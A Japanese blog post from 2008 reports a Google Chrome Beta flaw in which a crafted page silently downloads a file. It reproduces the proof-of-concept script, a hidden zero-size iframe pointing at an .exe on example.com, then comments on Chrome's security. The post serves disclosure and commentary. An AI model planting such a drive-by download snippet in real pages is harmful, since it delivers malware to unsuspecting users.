« Google Chrome Beta に不正なリンクでクラッシュするセキュリティホール | トップページ | Google Chrome Beta に不正なHTTPヘッダでブラウザが強制終了するセキュリティホール »

2008年9月 4日 (木)

Google Chrome Beta にページを表示しただけで自動的にファイルをダウンロードしてしまうセキュリティホール

さて、今日はGoogle Chromeのレビューを書くつもりだったんですが、昨日に引き続きまたもセキュリティホールの報告を発見してしまったので、先にそっちを書きます。

Google Chrome Browser 0.2.149.27 Automatic File Download Exploit

というわけで、Google Chrome 0.2.149.27 でユーザーに警告することなく自動的にファイルをダウンロードしてしまうセキュリティホールです。
細工を施されたページにアクセスするだけで、Google Chromeはユーザーに警告を表示することもなく、自動的にファイルをダウンロードしてしまいます。

Ws000044

ダウンロードされたファイルは、規定ではマイドキュメントの"ダウンロード"フォルダに保存されます。

Ws000045

マルウェアを知らないうちにダウンロードさせられて、うっかり実行してしまうかもしれない危険性がありますね。

この現象は以下のコードによって実現されます。

<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>

IFRAMEの扱いに問題があるみたいですが。。。
ちょっとこれは単純すぎるんじゃないでしょうか(^^;;

Beta版だからと言われればそれまでですが、IE、Firefoxといった現行のブラウザのセキュリティレベルを考えると、Google Chromeはまだまだ釣り合っていないのかなあ。と思ってしまいます。Google DocsやGMailを使うときには便利だし、起動も速いのでいいなぁと思っていましたが、まだまだ安心して実用できるものじゃないですね。

こういったセキュリティホールやバグはまだまだたくさん出てきそうです。なんだかIE3.0、4.0あたりの時代を思い出します。これについてはGoogleがどこまで素早く対応するかで勝負が決まると思います。「穴があるけどすぐ塞がる」というのはユーザーにギリギリですが安心感を与えますからね。

逆に、長い間不具合を放置しておいてなかなかパッチをリリースしない、ということではどんどんユーザーが離れていってしまい、最終的に品質が良くなったとしてももう見向きもされない。ということになり兼ねません。

昨日に引き続き、Googleがどう対応していくか楽しみです。

|

« Google Chrome Beta に不正なリンクでクラッシュするセキュリティホール | トップページ | Google Chrome Beta に不正なHTTPヘッダでブラウザが強制終了するセキュリティホール »

コメント

コメントを書く



(ウェブ上には掲載しません)




トラックバック

この記事のトラックバックURL:
http://app.f.cocolog-nifty.com/t/trackback/125677/23482466

この記事へのトラックバック一覧です: Google Chrome Beta にページを表示しただけで自動的にファイルをダウンロードしてしまうセキュリティホール:

» google chrome [domuの日記]
gooleからgoogle chromeというブラウザが発表されました。無料でダウンロードできます。早速インストールしてみました。評判どおりシンプルです。シンプルで軽いというのが売りみたいです。最近IEだけでなく、いろいろなブラウザがあります。パソコンをよく使う人はこだわりがあるのかもしれませんが、私のような素人はそれほど違いを感じることができません。気分転換みたいなものです。ただマウスジェ... [続きを読む]

受信: 2008年9月 4日 (木) 10時15分

« Google Chrome Beta に不正なリンクでクラッシュするセキュリティホール | トップページ | Google Chrome Beta に不正なHTTPヘッダでブラウザが強制終了するセキュリティホール »